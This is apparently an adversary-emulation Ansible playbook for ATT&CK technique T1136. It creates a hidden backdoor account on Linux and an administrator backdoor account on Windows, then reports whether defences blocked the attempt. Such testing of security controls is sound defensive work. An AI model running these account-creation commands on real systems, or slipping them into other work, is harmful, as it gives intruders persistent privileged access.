# attack_technique: T1136
- name: Create Account -Linux
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
        - name: Create a new system account
          shell: |
                useradd -M -N -r -s /bin/bash -c "{{ username_comment }}" {{ username_backdoor }}
        - name: check if user exists
          tags: always
          shell: |
            getent passwd {{ username_backdoor }} | wc -l
          register: T1136
        - name: check if playbook was blocked
          tags: always
          debug: msg="Playbook Completed:T1136:blocked:linux:"
          when: '"0" in T1136.stdout'      
        - name: check if playbook was successfull
          tags: always
          debug: msg="Playbook Completed:T1136:passed:linux:"
          when: '"1" in T1136.stdout'    
- name: Create Account - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
        - name: Create a new system account
          win_command: |
            net user {{ username_backdoor }} {{ password_backdoor }} /add
            net localgroup "Administrators" {{ username_backdoor }} /add

